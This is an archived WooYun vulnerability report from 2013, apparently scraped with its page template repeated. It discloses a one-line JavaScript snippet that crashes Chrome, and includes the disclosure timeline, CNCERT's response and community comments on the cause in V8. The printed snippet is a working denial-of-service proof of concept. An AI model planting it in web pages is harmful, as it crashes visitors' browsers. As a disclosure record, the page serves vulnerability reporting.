让chrome浏览器崩溃的一段JS代码 | wooyun-2013-021500| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021500

漏洞标题：让chrome浏览器崩溃的一段JS代码

漏洞作者：木羊

提交时间：2013-04-10 11:36

修复时间：2013-07-09 11:37

公开时间：2013-07-09 11:37

漏洞类型：拒绝服务

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-04-10：细节已通知厂商并且等待厂商处理中
2013-04-12：厂商已经确认，细节仅向厂商公开
2013-04-15：细节向第三方安全合作伙伴开放
2013-06-06：细节向核心白帽子及相关领域专家公开
2013-06-16：细节向普通白帽子公开
2013-06-26：细节向实习白帽子公开
2013-07-09：细节向公众公开

简要描述：

在页面中存一行代码，用chrome打开会崩溃

详细说明：

在页面中存一行JS代码，用chrome打开会崩溃，如何利用还有待挖掘。只是上报，非原创，求邀请码。

漏洞证明：

<script>new Array(-1>>>0).join(',')</script>

修复方案：

无

版权声明：转载请注明来源木羊@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2013-04-12 17:15

厂商回复：

先行确认吧，暂时不能确认是否可以利用发起溢出情况。给个rank 9吧，据说提交google有美金？

漏洞评价：

2013-04-10 11:41 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

这个漏洞，可以扰民么？
2013-04-10 12:08 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

@疯狗无限循环也可以让很多浏览器崩溃。。。
2013-04-10 12:09 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

@疯狗我觉得这更多是程序员的原因。。
2013-04-10 12:09 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

@梧桐雨太暴力了，这个会优雅点么
2013-04-10 12:10 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

@疯狗好吧，怀着期待的眼光期待一下..
2013-04-10 18:41 | isxenos ( 实习白帽子 | Rank:71 漏洞数:8 | 也好)

厂商不存在骗不到RANK的
2013-04-10 19:25 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

@isxenos 如果确实有价值，乌云是会代替厂商给发rank的
2013-04-10 20:23 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )

@疯狗这句话让我很伤心....
2013-04-10 20:44 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

@yy520 放心啦都会补上的
2013-04-10 21:22 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

@isxenos 这个都可以直接去提交到谷歌去刷钱去呗
2013-04-12 16:37 | cncert国家互联网应急中心(乌云厂商)

正在进行p.o.c的逆向分析，待原理搞明白之后再处理。
2013-04-12 18:06 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

这个是什么厂商？是cert回复的？谷歌不来这啊
2013-07-03 14:21 | 小卢 ( 路人 | Rank:5 漏洞数:2 | 唔，什么都木有~)

据说提交google有美金？- -厂商回复亮了~
2013-07-04 07:57 | zyymartin ( 实习白帽子 | Rank:47 漏洞数:22 )

@小卢厂商要确认漏洞，然后发给谷歌拿奖金
2013-07-04 12:37 | zyymartin ( 实习白帽子 | Rank:47 漏洞数:22 )

@cncert国家互联网应急中心是由于代码异常导致v8遇到超大数组时候自己调用制造的CRASH导致的异常崩溃
2013-07-09 13:08 | insight-labs ( 普通白帽子 | Rank:623 漏洞数:75 | Security guys)

我对这个是怎么找到的感兴趣。
2013-07-09 13:25 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

同问。。洞主是怎么想起来这个的＝＝

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021500

漏洞标题：让chrome浏览器崩溃的一段JS代码

相关厂商：Google

漏洞作者：木羊

提交时间：2013-04-10 11:36

修复时间：2013-07-09 11:37

公开时间：2013-07-09 11:37

漏洞类型：拒绝服务

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源木羊@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021500

漏洞标题：让chrome浏览器崩溃的一段JS代码

相关厂商：Google

漏洞作者： 木羊

提交时间：2013-04-10 11:36

修复时间：2013-07-09 11:37

公开时间：2013-07-09 11:37

漏洞类型：拒绝服务

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-021500"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 木羊@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：木羊

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源木羊@乌云